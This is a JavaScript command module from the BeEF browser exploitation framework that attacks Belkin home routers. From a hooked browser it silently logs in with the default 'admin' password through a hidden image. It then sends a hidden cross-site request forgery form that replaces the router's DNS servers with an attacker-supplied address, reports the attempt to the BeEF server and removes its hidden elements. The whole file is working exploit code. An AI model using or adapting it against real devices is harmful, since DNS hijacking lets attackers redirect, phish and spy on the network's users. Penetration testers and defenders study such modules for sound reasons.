//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	// config
	var gateway = '<%= @base %>'; 
	var path    = '/cgi-bin/setup_dns.exe';
	var dns     = '<%= @dns %>';
	var timeout = 15;

	// validate DNS server IP address
	var parts = dns.split('.');
	if (parts.length != 4) {
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
		return;
	}
	for (var i=0; i<parts.length; i++) {
		var part = parts[i];
		if (isNaN(part) || part < 0 || part > 255) {
			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
			return;
		}
	}
	var dns_1 = parts[0];
	var dns_2 = parts[1];
	var dns_3 = parts[2];
	var dns_4 = parts[3];

	// attempt auth with default password (admin)
	// incorrect login attempts do not log out an authenticated session
	var img = new Image();
	img.setAttribute("style", "visibility:hidden");
	img.setAttribute("width", "0");
	img.setAttribute("height","0");
	img.id = 'belkin_auth_<%= @command_id %>';
	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
	document.body.appendChild(img);

	// change DNS
	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
	]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	// clean up
	cleanup = function() {
		document.body.removeChild(belkin_iframe_<%= @command_id %>);
		document.body.removeChild(belkin_auth_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});